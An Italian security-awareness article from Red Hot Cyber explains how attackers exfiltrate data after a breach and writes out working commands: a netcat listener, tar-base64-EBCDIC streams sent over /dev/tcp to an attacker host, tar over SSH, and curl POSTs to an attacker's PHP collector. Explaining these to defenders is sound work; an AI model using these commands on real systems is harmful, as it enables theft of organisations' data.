Fernando Curzi : 19 Dicembre 2022 08:13
Abbiamo più volte parlato di Data Breach con Red Hot Cyber , grosse mole di dati esfiltrati da banche dati e rivenduti sul darkweb. Ma come avvengono tecnicamente queste transizioni?
In teoria una volta che il cyber criminale è stato in grado di mettere mano sulle informazioni sensibili attraverso uno sfruttamento di una Backdoor o di una sessione persistente APT (Advanced Session Threat), avrà necessità di spostare questi dati al di fuori dell’infrastruttura in modo sicuro e il più inosservato possibile all’interno di sistemi gestiti dall’organizzazione criminale.
La fantasia in questi scenari non tarda ad arrivare.
Iscriviti GRATIS alla RHC Conference 2025 (Venerdì 9 maggio 2025)
Il giorno Venerdì 9 maggio 2025 presso il teatro Italia di Roma (a due passi dalla stazione termini e dalla metro B di Piazza Bologna), si terrà
la RHC Conference 2025. Si tratta dell’appuntamento annuale gratuito, creato dalla community di RHC, per far accrescere l’interesse verso le tecnologie digitali, l’innovazione digitale e la consapevolezza del rischio informatico.
La giornata inizierà alle 9:30 (con accoglienza dalle 9:00) e sarà interamente dedicata alla RHC Conference, un evento di spicco nel campo della sicurezza informatica. Il programma prevede un panel con ospiti istituzionali che si terrà all’inizio della conferenza. Successivamente, numerosi interventi di esperti nazionali nel campo della sicurezza informatica si susseguiranno sul palco fino alle ore 19:00 circa, quando termineranno le sessioni. Prima del termine della conferenza, ci sarà la premiazione dei vincitori della Capture The Flag prevista per le ore 18:00.
Potete iscrivervi gratuitamente all'evento utilizzando questo link.
Per ulteriori informazioni, scrivi a [email protected] oppure su Whatsapp al 379 163 8765
Supporta RHC attraverso:
Ti piacciono gli articoli di Red Hot Cyber? Non aspettare oltre, iscriviti alla newsletter settimanale per non perdere nessun articolo.
Con questo articolo si cerca di mostrare come avvengono le esfiltrazioni in modo da sensibilizzare i tecnici ponendo l’ attenzione su alcune configurazioni di policy di networking che non dovrebbero essere tralasciate.
Uno dei metodi più comuni da attuare è quello che prevede la creazione di un socket TCP locale sul sistema vittima che punta alla macchina dell’attaccante, dualmente su quest’ultima potrebbe essere configurato un Listner con Netcat che si mette in ascolto per la ricezione dei dati.
In genere gli aggressori per evitare il monitoraggio on-the-wire effettuano compressioni e codifiche dei dati in Base64 ed EBCDIC (Extended Binary Codec Decimal Interchange Code) e solo dopo queste prime procedure avviano il vero trasferimento dei dati verso il proprio sistema ove verranno poi decodificati.
Vediamo alcuni comandi che potrebbe utilizzare un malintenzionato nell’attività di data exfiltration:
L’aggressore sul suo sistema, per prima cosa configura un listner con Netcat sulla porta TCP/80 per ricevere i dati in entrata reindirizzando l’output ad un file “data.tmp”
Il comando è:
nc –nlvpc 80 > data.tmp
Sul sistema vittima (si sottointende che sia già violato) potrebbe avere senso una compressione della cartella da esfiltrare sull’output standard (stdout) (-) codificando il tutto con Base64 e EBCID, reindirizzando subito dopo i dati sul proprio socket TCP locale della sua macchina. Nell’esempio che ho fatto data.tmp è la cartella contenente i dati da esfiltrare. Il comando completo potrebbe essere questo:
tar zfc - /tmp/datafolder | base64 | dd conv=ebcdic > /dev/tcp//80
Sulla macchina attaccante l’aggressore decodifica il file data.tmp sull’output data.tar
dd conv=ascii if=data.tmp |base64 –d > data.tar
L’aggressore estrae l’archivio data.tar sul proprio sistema avendo disponibilità dei dati in chiaro.
Un altro metodo un po’ più semplice e altrettanto comune è quello di non codificare i dati in transito nella rete ma cifrarli utilizzando il protocollo SSH. Il metodo con cifratura potrebbe avere migliori probabilità di eludere qualsiasi sistema di monitoraggio nella rete da parte degli IPS e IDS.
Sul sistema vittima , l’aggressore esegue il comando:
tar zfc - /tmp/data | ssh root@ “cd /tmp; tar zxpf –“
Sul sistema attaccante i dati sono già decompressi nella cartella tmp/data e potrà visualizzarli direttamente.
Per una maggiore “furtività”, potrebbe configurare un suo server SSH sulla porta 80 e non sulla porta 22 utilizzata comunemente da SSH.
Il terzo metodo ha un paio di prerequisiti ma è un altro ottimo modo per trasferire dati su protocolli cifrati, in questo caso Https con certificati SSL.
Per svolgere questo tipo di esfiltrazione l’aggressore deve disporre necessariamente un web server con PHP e un certificato SSL installato.
Sul sistema attaccante, l’aggressore potrebbe creare un file PHP che scriverà i dati ricevuti come POST request all’interno di un file chiamato /tmp/datafolder.base64 , per distinguerlo chiamerò questo file “contact.php”. Per una maggiore furtività il codice contenuto del file potrebbe essere inserito in single line (in una riga).
Contact.php
Sul sistema vittima l’aggressore invierà il comando curl con una richiesta POST costituita dai dati compressi e codificati in tar e Base64 dalla directory /tmp/data della vittima, che si tradurrà in una richiesta POST al file contact.php sul web server da lui gestito che svolgerà la funzione di scrivere una copia dell’archivio. Il comando potrebbe essere questo:
curl --data “$(tar zcf - /tmp/data | base64)” https:///contact.php
La macchina dell’attaccante dopo aver ricevuto i dati via POST li ha scritti nel file /tmp/data.base64 reindirizzando l’output ad un archivio data.tar
cat /tmp/data.base64 | base64 –d > data.tar && tar xf data.tar
Questi sono solo alcuni esempi di tecniche exfiltration ma considerando che ormai l’avvento dei ransomware ha reso il tutto più dinamico, molti di questi comandi insieme ad altri vengono introdotti e integrati all’interno del codice sorgente dei malware. Un buon sistema di monitoraggio abbinato ad un adeguato grado di sicurezza dei sistemi potrebbe bloccare un eventuale data breach, e con “buon sistema di monitoraggio” intendo in questo caso che non bisogna tralasciare nessun protocollo, ignorare il monitoraggio sui protocolli di rete che svolgono determinate funzioni considerate “sicure” come per esempio il “DNS” non è una buona pratica e vanno assolutamente monitorati e attuate policy adeguate che non ritengo opportuno elencare in questo articolo. Su questo argomento comunque ci ritorneremo con Hackerhood, per gli scettici vedremo un tutorial completo di come avviene una creazione di un server per un’esfiltrazione via DNS e una triangolazione verso il sistema attaccante.
1° Maggio, un giorno per onorare chi lavora, chi lotta per farlo in modo dignitoso e chi, troppo spesso, perde la vita mentre svolge la propria mansione. Nel 2025, l’Italia continua a pian...
Domani celebreremo uno degli elementi più iconici – e al tempo stesso vulnerabili – della nostra vita digitale: la password. Da semplice chiave d’accesso inventata negli anni...
Ci sono luoghi nel web dove la normalità cede il passo all’illecito, dove l’apparenza di un marketplace moderno e funzionale si trasforma in una vetrina globale per ogni tipo di rea...
Le backdoor come sappiamo sono ovunque e qualora presenti possono essere utilizzate sia da chi le ha richieste ma anche a vantaggio di chi le ha scoperte e questo potrebbe essere un caso emblematico s...
Il 25 febbraio 2025 WindTre ha rilevato un accesso non autorizzato ai sistemi informatici utilizzati dai propri rivenditori. L’intrusione, riconosciuta come un’azione malevola, è st...
Copyright @ REDHOTCYBER Srl
PIVA 17898011006